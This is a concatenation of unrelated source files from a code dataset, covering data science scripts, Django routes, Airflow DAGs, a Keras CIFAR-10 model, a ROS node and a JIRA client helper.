LDAvis.prepare(lda_model_DH, Vect_DH, MyVectLDA_DH, mds='tsne')\npanel = LDAvis.prepare(lda_model, allbookDTM, allbookCV, mds='tsne')\n\n### !!!!!!! Important - you must interrupt and close the kernet in Spyder to end\n## In other words - press the red square and then close the small red x to close\n## the Console\npyLDAvis.show(panel)\n\n\n\n\n","sub_path":"IST736/code/Team_Goth_Projectv20.py","file_name":"Team_Goth_Projectv20.py","file_ext":"py","file_size_in_byte":95693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"406539334","text":"\"\"\"Author: Nguyen Thi Xuan Nguyen\nUPI: NUGN742\nStudent ID: 952236821\nCS320 A3-3\"\"\"\n\ndef sortTime(a_list):\n return (a_list[0])\n\ndef main():\n n = int(input())\n for i in range(n):\n line = input().split()\n intervals = []\n for k in range(0, len(line), 2):\n intervals.append([int(line[k]), int(line[k+1])])\n\n intervals = sorted(intervals, key = sortTime)\n\n merge_in = [intervals[0]]\n for item in intervals:\n if item[0] > merge_in[-1][1]:\n merge_in.append(item)\n elif merge_in[-1][1] < item[1]:\n merge_in[-1][1] = item[1]\n\n result_list = []\n for item in merge_in:\n result_list.append(item[1] - item[0])\n\n result = max(result_list)\n print(result)\n\nmain()\n","sub_path":"Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"387652845","text":"from django.conf.urls import url\n\nurlpatterns = [\n url(r'^$', 'pos.views.index', name='index'),\n url(r'^products/$', 'pos.views.products', name='products'),\n url(r'^product/(?P[0-9]+)/$', 'pos.views.product', name='product'),\n url(r'^cart/$', 'pos.views.get_cart', name='cart'),\n url(r'^cart/get-total/$', 'pos.views.cart_total', name='cart_total'),\n url(r'^cart/add/(?P[0-9]+)/$', 'pos.views.add_to_cart', name='add_cart'),\n url(r'^cart/update/$', 'pos.views.update_cart', name='update_cart'),\n url(r'^cart/empty/$', 'pos.views.empty_cart', name='empty_cart'),\n url(r'^cart/remove/(?P[0-9]+)/$', 'pos.views.cart_remove', name='cart_remove'),\n url(r'^cart/checkout/$', 'pos.views.checkout', name='checkout'),\n]\n","sub_path":"pos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"505245716","text":"import random\r\n# In this code, we attempt to use genetic algorithms to find variables in an equation. Please note that this code isnt in its\r\n# final form and steps such as optimizing parameters or introducing reinforcement learning can help achieve perfect results.\r\n\r\n# Here given a value P i.e. pressure, we try to find V, n and T that lie in a boundary. This code using the ideal gas equation\r\n# but can be changed for any equation. To get better values of the variables, run the code again and again.\r\n\r\ndef generate_pop(size,V_boundary,n_boundary,T_boundary):\r\n V_lower_boundary, V_upper_boundary = V_boundary\r\n n_lower_boundary, n_upper_boundary = n_boundary\r\n T_lower_boundary, T_upper_boundary = T_boundary\r\n\r\n population = []\r\n for i in range(size):\r\n individual = {\r\n 'V' : random.uniform(V_lower_boundary,V_upper_boundary),\r\n 'n': random.uniform(n_lower_boundary,n_upper_boundary),\r\n 'T': random.uniform(T_lower_boundary, T_upper_boundary)\r\n }\r\n population.append(individual)\r\n return population\r\n\r\ndef function(individual,P):\r\n \"\"\"Calculates the function we want to find the max of/ also counts as fitness\"\"\"\r\n V = individual['V']\r\n n = individual['n']\r\n T = individual['T']\r\n\r\n P_calc = (n*T*8.8314)/V\r\n fitness = P- P_calc\r\n return fitness\r\n\r\ndef sort_pop_by_fitness(population):\r\n sorted_pop = sorted(population , key= function)\r\n return sorted_pop\r\n\r\ndef crossover(sorted_pop):\r\n individual_a = sorted_pop[-1]\r\n individual_b = sorted_pop[-2]\r\n Va = individual_a['V']\r\n na = individual_a['n']\r\n Ta = individual_a['T']\r\n\r\n Vb = individual_b['x']\r\n nb = individual_b['y']\r\n Tb = individual_b['T']\r\n\r\n return {'V': (Va + Vb) / 3, 'n': (na + nb) / 3, 'T': (Ta + Tb) / 2}\r\n\r\ndef mutation(individual,V_boundary,n_boundary,T_boundary):\r\n next_V = individual['V'] + random.uniform(-0.5, 0.5)\r\n next_n = individual['n'] + random.uniform(-0.3, 0.3)\r\n next_T = individual['T'] + random.uniform(-10, 10)\r\n\r\n V_lower_boundary, V_upper_boundary = V_boundary\r\n n_lower_boundary, n_upper_boundary = n_boundary\r\n T_lower_boundary, T_upper_boundary = T_boundary\r\n # Guarantee its within the boundaries\r\n next_V = min(max(next_V,V_lower_boundary), V_upper_boundary)\r\n next_n = min(max(next_n, n_lower_boundary), n_upper_boundary)\r\n next_T = min(max(next_T, T_lower_boundary), T_upper_boundary)\r\n\r\n return {'V': next_V, 'n': next_n, 'T' : next_T}\r\n\r\ndef make_next_gen(previous_population, individual,population):\r\n next_gen = []\r\n pop_size = len(previous_population)\r\n\r\n for i in range(pop_size):\r\n individual = crossover(sort_pop_by_fitness(population))\r\n individual= mutation(individual)\r\n next_gen.append(individual)\r\n return next_gen\r\n\r\ngenerations = 10000\r\n\r\npopulation = generate_pop(size=30, V_boundary=(1, 10), n_boundary=(0.1, 10), T_boundary= (1, 100))\r\ni = 1\r\nP = 100\r\nbest_scores = []\r\nwhile True:\r\n print('Generation:', i)\r\n for individual in population:\r\n print(individual)\r\n print(function(individual,P))\r\n if function(individual, P) == 0:\r\n print('The solution is:' + function(individual, P))\r\n break\r\n elif (function(individual, P) >= -10) and (function(individual, P) <= 20):\r\n print('The solution is close to :', function(individual, P), 'The variables are:', individual)\r\n break\r\n i = i+1\r\n if i == generations:\r\n break\r\n\r\n","sub_path":"Genetic algorithm - Ideal gas.py","file_name":"Genetic algorithm - Ideal gas.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"629880025","text":"import gym\nimport pybullet_envs # noqa: F401\nimport pytest\nfrom stable_baselines3.common.env_checker import check_env\n\nfrom utils.utils import get_wrapper_class\nfrom utils.wrappers import ActionNoiseWrapper, DelayedRewardWrapper, HistoryWrapper, TimeFeatureWrapper\n\n\ndef test_wrappers():\n env = gym.make(\"HalfCheetahBulletEnv-v0\")\n env = DelayedRewardWrapper(env)\n env = ActionNoiseWrapper(env)\n env = HistoryWrapper(env)\n env = TimeFeatureWrapper(env)\n check_env(env)\n\n\n@pytest.mark.parametrize(\n \"env_wrapper\",\n [\n None,\n {\"utils.wrappers.HistoryWrapper\": dict(horizon=2)},\n [{\"utils.wrappers.HistoryWrapper\": dict(horizon=3)}, \"utils.wrappers.TimeFeatureWrapper\"],\n ],\n)\ndef test_get_wrapper(env_wrapper):\n env = gym.make(\"HalfCheetahBulletEnv-v0\")\n hyperparams = {\"env_wrapper\": env_wrapper}\n wrapper_class = get_wrapper_class(hyperparams)\n if env_wrapper is not None:\n env = wrapper_class(env)\n check_env(env)\n","sub_path":"rl-baselines3-zoo/tests/test_wrappers.py","file_name":"test_wrappers.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"615926101","text":"# coding: utf-8\n#\n# This file is part of Sequana software\n#\n# Copyright (c) 2016 - Sequana Development Team\n#\n# File author(s):\n# Thomas Cokelaer \n# Dimitri Desvillechabrol ,\n# \n#\n# Distributed under the terms of the 3-clause BSD license.\n# The full license is in the LICENSE file, distributed with this software.\n#\n# website: https://github.com/sequana/sequana\n# documentation: http://sequana.readthedocs.io\n#\n##############################################################################\n\"\"\"Module to write coverage report\"\"\"\nimport os\nimport glob\nimport io\n\nfrom sequana.modules_report.base_module import SequanaBaseModule\nfrom sequana.utils import config\n\nfrom sequana.lazy import pandas as pd\nfrom sequana.lazy import pylab\nfrom sequana import logger, sequana_data\n\nfrom sequana.utils.datatables_js import DataTable\n\n\nclass KrakenModule(SequanaBaseModule):\n \"\"\" Write HTML report of Kraken results\"\"\"\n def __init__(self, input_directory, output_filename=None):\n \"\"\"\n :param input_directory: the directory of the bwa_bam_to_fastq output\n :param output_filename: if not provided, the HTML is not created.\n\n \"\"\"\n super().__init__()\n self.title = \"Kraken report\"\n self.directory = input_directory\n self.create_report_content()\n if output_filename:\n self.create_html(output_filename)\n\n def create_report_content(self):\n \"\"\" Generate the sections list to fill the HTML report.\n \"\"\"\n self.sections = list()\n self.add_summary_section()\n\n def _get_stats(self):\n df = pd.read_csv(self.directory + os.sep + \"kraken.csv\")\n return df\n\n def _get_summary_section(self):\n\n\n df = self._get_stats()\n if len(df) == 1 and df.iloc[0]['taxon'] == -1:\n pngimage = sequana_data(\"no_data.jpg\")\n extra = \"

    no reads could be identified with the given the database(s).\"\n else:\n pngimage = self.directory + os.sep + \"kraken.png\"\n extra = \"\"\"

    The following clickable image is a simplified \nversion (only genus are shown) of an interactive and more detailled version \nbased on Krona. Finally, note that the unclassified species in the pie plot \nmay correspond to species not present in the data base or adapters (if not \nremoved).

    \"\"\"\n\n html = \"\"\"\n

    Overview of the Taxonomic content of the filtered reads.

    \n

    The taxonomic analysis is performed with Kraken (see database name in \nthe configuration file. The analysis is performed with a Kmer\napproach.\nThe details about the database itself are available in the Sequana documentation.\nThe taxonomic analysis should give a good idea of the content of the FastQ\nfiles but should be used as a sanity check. Indeed, species absent\nfrom the database won't be detected leading to false detection (close species \nmay be detected instead). \nBesides, be aware that closely related species may not be classified precisely.\n

    \n\n {0}\n \n
    \n\"\"\".format(extra, self.directory.split(os.sep, 1)[1], \n self.png_to_embedded_png(pngimage))\n\n datatable = DataTable(df, \"kraken\", index=False)\n # add links\n if \"ena\" in df.columns:\n urlena = \"http://www.ebi.ac.uk/ena/data/view/\"\n datatable.datatable.set_links_to_column(\"ena\",\n [urlena + this for this in df['ena']])\n datatable.datatable.datatable_options = {\n 'scrollX': '300px',\n 'pageLength': 30,\n 'scrollCollapse': 'true',\n 'dom': 'irtpB',\n \"paging\": \"false\",\n \"order\": [[ 2, \"desc\"]],\n 'buttons': ['copy', 'csv']}\n js = datatable.create_javascript_function()\n html_tab = datatable.create_datatable(float_format='%.3g')\n\n html += \"{} {}\".format(html_tab, js)\n \"\"\"# Rounding and convert in string to avoid exp notation\n df['percentage'] = df['percentage'].apply(lambda x: str(round(x,4)))\n #self.jinja['kraken_json'] = df.to_json()\"\"\"\n\n return html\n\n def add_summary_section(self):\n html = self._get_summary_section()\n self.sections.append({\n \"name\": \"Taxonomic content\",\n \"anchor\": \"kraken\",\n \"content\": html\n })\n\n","sub_path":"sequana/modules_report/kraken.py","file_name":"kraken.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"301312443","text":"p=int(input(\"Max multiplyer :\"))\r\nnum_arr=set();\r\nfor i in range (p,1,-1):\r\n num_arr.add(i)\r\n if (i<=(p/2)):\r\n for I in range (2*i,p+1,i):\r\n num_arr.discard(I)\r\nmaxnum=1\r\nprint(num_arr)\r\n\r\nfor i in list(num_arr):\r\n j=i\r\n while True:\r\n if i*j<=p:\r\n i=i*j\r\n else:\r\n break\r\n print(i) \r\n maxnum=maxnum*i\r\nprint(maxnum)\r\n","sub_path":"005/PE005.py","file_name":"PE005.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"282089329","text":"# -*- coding: utf-8 -*-\nimport yfinance as yf\nimport mplfinance as fplt\n\ndef draw_candle_chart( stock_id ):\n stock_id = str( stock_id ) + \".TW\" # Yahoo Finance 的 代號為台灣的代號 + .TW\n data = yf.Ticker( stock_id ) # 抓取資料\n \n # 1mo = 1個月,max 可以把所有期間的資料都下載\n ohlc = data.history( period=\"2mo\" )\n ohlc = ohlc.loc[ :, [\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"] ] # 選擇製圖需要欄位(開高低收量)\n \n # 調整圖表標示顏色\n mc = fplt.make_marketcolors(\n up = 'tab:red',down = 'tab:green', # 上漲為紅,下跌為綠\n wick = {'up':'red','down':'green'}, # 影線上漲為紅,下跌為綠\n volume = 'tab:green', # 交易量顏色\n )\n \n s = fplt.make_mpf_style( marketcolors = mc ) # 定義圖表風格\n \n fplt.plot(\n ohlc, # 開高低收量的資料\n type = 'candle', # 類型為蠟燭圖,也就是 K 線圖\n style = s, # 套用圖表風格\n title = stock_id, # 設定圖表標題\n ylabel = 'Price ($)', # 設定 Y 軸標題\n volume = True,\n savefig='stock_Kbar.png', # 儲存檔案\n )\n #fplt.show()\nif __name__ == \"__main__\":\n draw_candle_chart( 1101 )","sub_path":"程式交易實作/禮拜一的課/主任上課範例_table/1. yahoo_funance 下載股票資料/3. 繪製圖表.py","file_name":"3. 繪製圖表.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"310640260","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport sys\nimport rospy\nimport cv2\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\ndef nothing(x):\n pass\n\nclass threshhold_determination:\n def __init__(self):\n self.bridge = CvBridge()\n self.image_sub = rospy.Subscriber(\"image_topic\",Image,self.callback)\n \n self.thresh=100\n cv2.namedWindow('CameraView') \n cv2.createTrackbar('Threshhold:', 'CameraView',0,255,nothing)\n def callback(self,data):\n #Convert the ROS image to a cv2 image\n try:\n img = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n\n \n self.thresh = cv2.getTrackbarPos('Threshhold:','CameraView')\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) \n ret, thresh_img = cv2.threshold(gray_img, self.thresh, 255, cv2.THRESH_BINARY) #84\n thresh_img = cv2.blur(thresh_img, (11,11))\n cv2.imshow(\"CameraView\",img)\n cv2.imshow(\"ThreshholdImage\",thresh_img)\n\n cv2.waitKey(3)\n \n########################################################################## \n \ndef main(args):\n td = threshhold_determination()\n rospy.init_node('ThresholdDet', anonymous=True)\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main(sys.argv) \n \n","sub_path":"product_detection/nodes/ThresholdTop.py","file_name":"ThresholdTop.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"299828910","text":"import uuid\nimport time\n\nfrom datetime import datetime\nfrom airflow import DAG\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.postgres_operator import PostgresOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.python_operator import BranchPythonOperator\nfrom airflow.operators.postgres_custom import CountRowsOperator\n\n\ndef create_dag(dag_id, schedule, table_name, default_args):\n\n def print_log(dag_id, database):\n print(f'{dag_id} start processing tables in database: {database}')\n\n def check_table_exist(schema_name, table_name):\n \"\"\"method to check that table exist\"\"\"\n hook = PostgresHook()\n check_schema_sql = 'SELECT schema_name ' \\\n 'FROM information_schema.schemata ' \\\n f'WHERE schema_name=\\'{schema_name}\\''\n\n check_table_sql = 'SELECT table_name FROM information_schema.tables ' \\\n f'WHERE table_schema=\\'{schema_name}\\' '\\\n f'AND table_name=\\'{table_name}\\';'\n\n schema = hook.get_first(check_schema_sql)\n if not schema:\n raise ValueError(f'Schema {schema_name} not found!')\n\n table = hook.get_first(check_table_sql)\n if table:\n print(f'Table {schema_name}.{table_name} found!')\n return 'skip_table_creation'\n print(f'Table {schema_name}.{table_name} not found!')\n return 'create_table'\n\n def query_table(**kwargs):\n hook = PostgresHook()\n sql = f'SELECT COUNT(*) FROM {table_name}'\n result = hook.get_first(sql)\n return result\n\n dag = DAG(dag_id, catchup=False, schedule_interval=schedule,\n default_args=default_args)\n\n with dag:\n print_log_task = PythonOperator(\n task_id='print_log',\n python_callable=print_log,\n op_kwargs={'dag_id': dag_id, 'database': table_name},\n dag=dag\n )\n\n get_user_task = BashOperator(\n task_id='get_user',\n # bash_command='echo $USER', # mock user with constant\n bash_command='echo airflow',\n xcom_push=True,\n dag=dag\n )\n\n check_table_task = BranchPythonOperator(\n task_id='check_table',\n python_callable=check_table_exist,\n op_args=[schema_name, table_name],\n dag=dag\n )\n\n create_table_task = PostgresOperator(\n task_id='create_table',\n sql=f'CREATE TABLE {table_name} ('\n f'id UUID NOT NULL, '\n f'\"user\" VARCHAR(50) NOT NULL, '\n f'\"timestamp\" TIMESTAMP NOT NULL);',\n dag=dag\n )\n\n skip_table_creation_task = DummyOperator(\n task_id='skip_table_creation',\n dag=dag\n )\n\n insert_row_task = PostgresOperator(\n task_id='insert_new_row',\n sql=f\"INSERT INTO {table_name} VALUES (\"\n f\"'{uuid.uuid4()}',\"\n \"'{{ task_instance.xcom_pull(task_ids='get_user') }}',\"\n f\"'{datetime.now()}');\",\n dag=dag,\n trigger_rule='all_done'\n )\n\n query_table_task = CountRowsOperator(\n task_id='query_the_table',\n table_name=table_name,\n provide_context=True,\n dag=dag\n )\n\n print_log_task >> get_user_task >> check_table_task\n check_table_task >> create_table_task >> insert_row_task\n check_table_task >> skip_table_creation_task >> insert_row_task\n insert_row_task >> query_table_task\n\n return dag\n\n\nfor i in range(1, 4):\n dag_id = f'dag_id_{i}'\n schedule = None\n schema_name = 'public'\n table_name = f'table_{i}'\n default_args = {\n 'owner': 'iistomin',\n 'start_date': datetime(2018, 11, 11)\n }\n\n globals()[dag_id] = create_dag(dag_id, schedule, table_name, default_args)\n","sub_path":"dags/jobs_dag.py","file_name":"jobs_dag.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"3268576","text":"import sys, re\nr = sys.stdin.readlines\n\nword = ''\nlength = 0\nlines = r()\nfor line in lines:\n\tline = re.sub('[^-a-zA-Z]+', ' ', line)\n\tline = line.rstrip().split()\n\tfor j, l in enumerate(map(len, line)):\n\t\tif l > length:\n\t\t\tlength = l\n\t\t\tword = line[j].lower()\n\nprint(word)","sub_path":"5000/05637_baekjoon.py","file_name":"05637_baekjoon.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"580053044","text":"#!/usr/bin/env python\n#------------------------------------------------------------------------\n# File and Version Information:\n# $Id$\n#\n# Description:\n# Module ex_cspad_img...\n#\n#------------------------------------------------------------------------\n\n\"\"\"This module provides an examples of how to get and plot CSPad image\n\nThis software was developed for the SIT project. If you use all or \npart of it, please give an appropriate acknowledgment.\n\n@see PyCSPadImage.CalibPars, PyCSPadImage.CSPADPixCoords\n\n@version $Id: 2014-07-02$\n\n@author Mikhail S. Dubrovin\n\"\"\"\nfrom __future__ import print_function\n\n#------------------------------\n# Module's version from CVS --\n#------------------------------\n__version__ = \"$Revision$\"\n# $Source$\n\n#----------\n# Imports \n#----------\nimport os\nimport sys\nimport numpy as np\n\nimport PyCSPadImage.CalibPars as calp\n\nfrom PSCalib.CalibFileFinder import CalibFileFinder\n\n#------------------------------\n\ndef test_01() :\n \"\"\" Test of access to calibration file\n \"\"\"\n path_to_clib_types = '/reg/d/psdm/xpp/xppi0815/calib/CsPad::CalibV1/XppGon.0:Cspad.0'\n runnum = 120\n type = 'pedestals'\n print(' path_to_clib_types: %s\\n type: %s\\n runnum: %d' % (path_to_clib_types, type, runnum))\n\n #calibstore = calp.CalibPars(path=path_calib, run=runnum)\n #pedestals = calibstore.getCalibPars('pedestals', runnum)\n\n fname = calp.findCalibFile(path_to_clib_types, type, runnum) \n print(' calibration file name: %s' % fname)\n\n#------------------------------\n\ndef test_02() :\n \"\"\" Test of access to calibration file\n \"\"\"\n\n cdir = '/reg/d/psdm/xpp/xppi0815/calib'\n group = 'CsPad::CalibV1'\n src = 'XppGon.0:Cspad.0'\n type = 'pedestals'\n rnum = 120\n\n print(' cdir: %s\\n type: %s\\n runnum: %d' % (cdir, type, rnum))\n\n cff = CalibFileFinder(cdir, group, pbits=0o377)\n fname = cff.findCalibFile(src, type, rnum)\n\n print(' calibration file name: %s' % fname)\n\n \n#------------------------------\n\nif __name__ == \"__main__\" :\n if len(sys.argv) <2 : test_01()\n elif sys.argv[1] == '1' : test_01()\n elif sys.argv[1] == '2' : test_02()\n sys.exit ( 'End of %s' % sys.argv[0] )\n\n#------------------------------\n","sub_path":"src/ex_find_calib_file.py","file_name":"ex_find_calib_file.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"232069020","text":"# Python ≥3.5 is required\nimport sys\nassert sys.version_info >= (3, 5)\n\n# Scikit-Learn ≥0.20 is required\nimport sklearn\nassert sklearn.__version__ >= \"0.20\"\n\n# try:\n# # %tensorflow_version only exists in Colab.\n# %tensorflow_version 2.x\n# except Exception:\n# pass\n\n# TensorFlow ≥2.0 is required\nimport tensorflow as tf\nfrom tensorflow import keras\nassert tf.__version__ >= \"2.0\"\n\n#%load_ext tensorboard\n\n# Common imports\nimport numpy as np\nimport os\n\n# to make this notebook's output stable across runs\nnp.random.seed(42)\n\n# To plot pretty figures\n#%matplotlib inline\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# Where to save the figures\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"deep\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\n\ndef logit(z):\n return 1 / (1 + np.exp(-z))\n\nz = np.linspace(-5, 5, 200)\n\n(X_train_full, y_train_full), (X_test, y_test) = keras.datasets.cifar10.load_data()\n\nX_train = X_train_full[5000:]\ny_train = y_train_full[5000:]\nX_valid = X_train_full[:5000]\ny_valid = y_train_full[:5000]\n\nkeras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nfor _ in range(20):\n model.add(keras.layers.Dense(100,\n kernel_initializer=\"lecun_normal\",\n activation=\"selu\"))\n\nmodel.add(keras.layers.AlphaDropout(rate=0.1))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))\n\noptimizer = keras.optimizers.Nadam(lr=5e-4)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])\n\nearly_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\nmodel_checkpoint_cb = keras.callbacks.ModelCheckpoint(\"my_cifar10_alpha_dropout_model.h5\", save_best_only=True)\nrun_index = 1 # increment every time you train the model\nrun_logdir = os.path.join(os.curdir, \"my_cifar10_alpha_logs\", \"run_alpha_dropout_{:03d}\".format(run_index))\ntensorboard_cb = keras.callbacks.TensorBoard(run_logdir)\ncallbacks = [early_stopping_cb, model_checkpoint_cb, tensorboard_cb]\n\nX_means = X_train.mean(axis=0)\nX_stds = X_train.std(axis=0)\nX_train_scaled = (X_train - X_means) / X_stds\nX_valid_scaled = (X_valid - X_means) / X_stds\nX_test_scaled = (X_test - X_means) / X_stds\n\nmodel.fit(X_train_scaled, y_train, epochs=100,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=callbacks)\n\nmodel = keras.models.load_model(\"my_cifar10_alpha_dropout_model.h5\")\nprint(model.evaluate(X_valid_scaled, y_valid))","sub_path":"06Chapter11TFBook/20Ex8ecifar10.py","file_name":"20Ex8ecifar10.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"237541035","text":"from jira.client import JIRA\r\nimport jira.config\r\nfrom Dev_Master import Dev_Meta\r\nimport xml.etree.ElementTree as ET\r\nfrom xml.etree.ElementTree import Element, SubElement, dump, ElementTree\r\n\r\nevent = 'dev' ## dev / release\r\ndev_local_path = 'd://project//python//JIRA_Estreamer//'\r\n\r\ndef GetPath():\r\n global event, dev_local_path\r\n if event == 'dev':\r\n return dev_local_path\r\n else:\r\n return ''\r\n\r\n#jira_usr = jira.config.get_jira('hlm')\r\n\r\n# HLM Dev. Tracker\r\nhlm_dev_url = \"http://hlm.lge.com/issue\"\r\n# HLM Q Tracker\r\nhlm_q_url = \"http://hlm.lge.com/qi\"\r\n\r\n# Project Id\r\n# project_id = 'SSP'\r\nproject_id = 'ESTREAMER'\r\n\r\n# jira issue query\r\njql_default = 'project='+project_id+' and '\r\njql_model_issue = jql_default+'filter in (L17_ESTREAMER_D_VA_실물검증)'\r\njql_test_issue = jql_default+'filter in (L17_ESTREAMER_D_VA_실물확인)'\r\njql_spec_issue = jql_default+'filter in (L17_ESTREAMER_D_VA_SPEC확인)'\r\n\r\n\r\n#jql_model_issue = jql_default+'filter in (L17_ESTREAMER_D_VA_실물검증_TEST)'\r\n#jql_test_issue = jql_default+'filter in (L17_ESTREAMER_D_VA_실물확인_TEST)'\r\n#jql_spec_issue = jql_default+'filter in (L17_ESTREAMER_D_VA_SPEC확인_TEST)'\r\n\r\n# E-Streamer S/W 담당자 : JIRA reporter & default assignee\r\nestreamer_sw = 'gayoung.lee'\r\n#estreamer_sw = 'ybin.cho'\r\n\r\n# Jira Login을 위한 session file name\r\nsession_file_name = 'jira_session.xml'\r\n\r\n# Jira 에서 issue 조회 시 maxResult개수를 지정해야 한다\r\n# @ jira_tracker.search_issues [default:50]\r\nmaxResult = 200\r\n\r\n# Fileter : 실물검증TEST -> 실물검증\r\n# project_id = 'SSP' -> 'ESTREAMER'\r\n# filter name : L17_ESTREAMER_D_VA_XXXX_TEST -> L17_ESTREAMER_D_VA_XXXX\r\n\r\nclass JIRA_Handler:\r\n main_issue_watchers = ['ybin.cho'] #, 'gayoung.lee']\r\n def __init__(self, tracker):\r\n # jira server url\r\n global hlm_dev_url, hlm_q_url\r\n\r\n global project_id\r\n global jql_model_issue, jql_test_issue, jql_spec_issue\r\n global estreamer_sw\r\n global session_file_name\r\n global GetPath\r\n global maxResult\r\n\r\n self.maxResultJira = maxResult\r\n\r\n self.jira_id=''\r\n self.pwd=''\r\n\r\n #exception : default DEV tracker\r\n if tracker.lower()==\"q\":\r\n self.url = hlm_q_url\r\n elif tracker.lower()==\"dev\":\r\n self.url = hlm_dev_url\r\n else: #default dev tracker\r\n self.url = hlm_dev_url\r\n\r\n self.issue_template = {'project':{\"key\":project_id}\r\n ,\"assignee\":{\"name\":estreamer_sw}\r\n ,'summary': '[Estreamer검증]'\r\n ,'description':'Test 중'\r\n ,'issuetype':{'name':'Request'}}\r\n self.jira=None\r\n self.jira_project_id = project_id\r\n self.jql_model = jql_model_issue\r\n self.jql_test = jql_test_issue\r\n self.jql_spec = jql_spec_issue\r\n\r\n self.session_file = GetPath()+session_file_name\r\n\r\n print(\"JIRA handler init.\")\r\n\r\n def saveSession(self):\r\n ## check login success\r\n if self.jira is None:\r\n return\r\n session = Element('Session')\r\n\r\n server = Element('jira_url')\r\n server.text = self.url\r\n session.append(server)\r\n\r\n account_id = Element('id')\r\n account_id.text = self.jira_id\r\n session.append(account_id)\r\n\r\n account_pwd = Element('passwd')\r\n account_pwd.text = self.pwd\r\n session.append(account_pwd)\r\n\r\n ## create or save session file\r\n ElementTree(session).write(self.session_file)\r\n\r\n def clearSession(self):\r\n try:\r\n tree = ET.parse(self.session_file)\r\n except FileNotFoundError:\r\n # need to do nothing\r\n return\r\n session = Element('Session')\r\n ## create or save session file\r\n ## write empty session tag to xml\r\n ElementTree(session).write(self.session_file)\r\n\r\n # local session file을 이용한 Login\r\n # Main의 slotLogin 과 동일한 동작 수행\r\n def sessionLogin(self, main_ui):\r\n try:\r\n tree = ET.parse(self.session_file)\r\n except FileNotFoundError:\r\n print(session_file)\r\n main_ui.setNeedLoginState(True)\r\n return\r\n\r\n root = tree.getroot()\r\n url = ''\r\n jira_id = ''\r\n pwd = ''\r\n try:\r\n url = root.find('jira_url').text\r\n jira_id = root.find('id').text\r\n pwd = root.find('passwd').text\r\n self.jira = JIRA(server=url, basic_auth=(jira_id, pwd))\r\n except:\r\n print(\"login failed\")\r\n main_ui.setNeedLoginState(True)\r\n return\r\n else:\r\n ## login success\r\n self.url = url\r\n main_ui.jira_tracker = self.jira\r\n users = self.jira.search_users(jira_id)\r\n if len(users)==1: ## found user\r\n main_ui.login_user = users[0]\r\n main_ui.lblUserName.setText(users[0].displayName)\r\n self.jira_id = jira_id\r\n self.pwd = pwd\r\n main_ui.setNeedLoginState(False)\r\n else:\r\n # 가능한 상황은 아니라고 생각되지만 예외처리는 코딩해두도록 한다\r\n main_ui.lblUserName.setText('')\r\n main_ui.login_user = None\r\n main_ui.setNeedLoginState(True)\r\n return\r\n return\r\n\r\n # text widget의 id와 passwd를 이용한 login\r\n def login(self, jira_id, pwd, isSaveAccount):\r\n self.jira_id = jira_id\r\n self.pwd = pwd\r\n try:\r\n self.jira = JIRA(server=self.url, basic_auth=(jira_id, pwd))\r\n except:\r\n return \"failed\"\r\n else:\r\n ## save session of login info to local file\r\n if isSaveAccount:\r\n 